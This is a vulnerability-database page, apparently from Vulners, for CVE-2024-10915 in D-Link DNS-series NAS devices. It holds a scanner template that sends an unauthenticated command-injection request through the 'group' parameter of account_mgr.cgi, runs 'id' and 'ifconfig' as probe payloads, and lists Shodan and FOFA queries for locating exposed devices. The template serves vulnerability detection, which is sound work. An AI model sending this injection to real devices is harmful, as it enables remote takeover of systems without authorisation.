| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| The vulnerability of the cgi_user_add function in the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add of D-Link routers such as DNS-320, DNS-320LW, DNS-325, and DNS-340L allows a hacker to execute arbitrary code. | 14 Nov 202400:00 | – | bdu_fstec | |
| Exploit for Improper Neutralization in Dlink Dns-320_Firmware | 11 Jul 202507:21 | – | githubexploit | |
| CVE-2024-10915 | 6 Nov 202414:03 | – | circl | |
| D-Link多款产品 安全漏洞 | 6 Nov 202400:00 | – | cnnvd | |
| CVE-2024-10915 | 6 Nov 202414:00 | – | cve | |
| CVE-2024-10915 D-Link DNS-320/DNS-320LW/DNS-325/DNS-340L account_mgr.cgi cgi_user_add os command injection | 6 Nov 202414:00 | – | cvelist | |
| CVE-2024-10915 | 6 Nov 202414:15 | – | nvd | |
| D-Link Multiple DNS NAS Devices Multiple Vulnerabilities (2024 - 2025) | 30 Jun 202500:00 | – | openvas | |
| PT-2024-7982 | 6 Nov 202400:00 | – | ptsecurity | |
| CVE-2024-10915 | 5 Feb 202504:55 | – | redhatcve |
id: CVE-2024-10915
info:
name: D-Link NAS - Command Injection via Group Parameter
author: s4e-io
severity: critical
description: |
A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection.
impact: |
Unauthenticated attackers can execute arbitrary OS commands via the group parameter, potentially compromising the entire D-Link NAS device.
remediation: |
Update D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L firmware to versions released after 20241028.
reference:
- https://www.usom.gov.tr/bildirim/tr-24-1836
- https://netsecfish.notion.site/Command-Injection-Vulnerability-in-group-parameter-for-D-Link-NAS-12d6b683e67c803fa1a0c0d236c9a4c5?pvs=4
- https://nvd.nist.gov/vuln/detail/CVE-2024-10915
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-10915
cwe-id: CWE-78,CWE-707
epss-score: 0.79135
epss-percentile: 0.99552
cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: dlink
product: dns-320_firmware
shodan-query: http.html:"sharecenter"
fofa-query: body="sharecenter"
tags: cve,cve2024,dlink,sharecenter,rce,vuln,vkev
http:
- raw:
- |
GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=%27;{{command}};%27 HTTP/1.1
Host: {{Hostname}}
payloads:
command:
- "id"
- "ifconfig"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)"
- "contains_all(body, 'inet addr:', 'Mask:')"
condition: or
- type: dsl
dsl:
- 'contains(body, "Content-type: text/html")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100cdd7545d9e8927497adb7629ea67a8663bb9a3dd0a665e57c9a6738eea680c41022003edd17be2779b94aeba79e7dd2abdb3eac7121a5b5ed6bbf6d03cc08076007d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation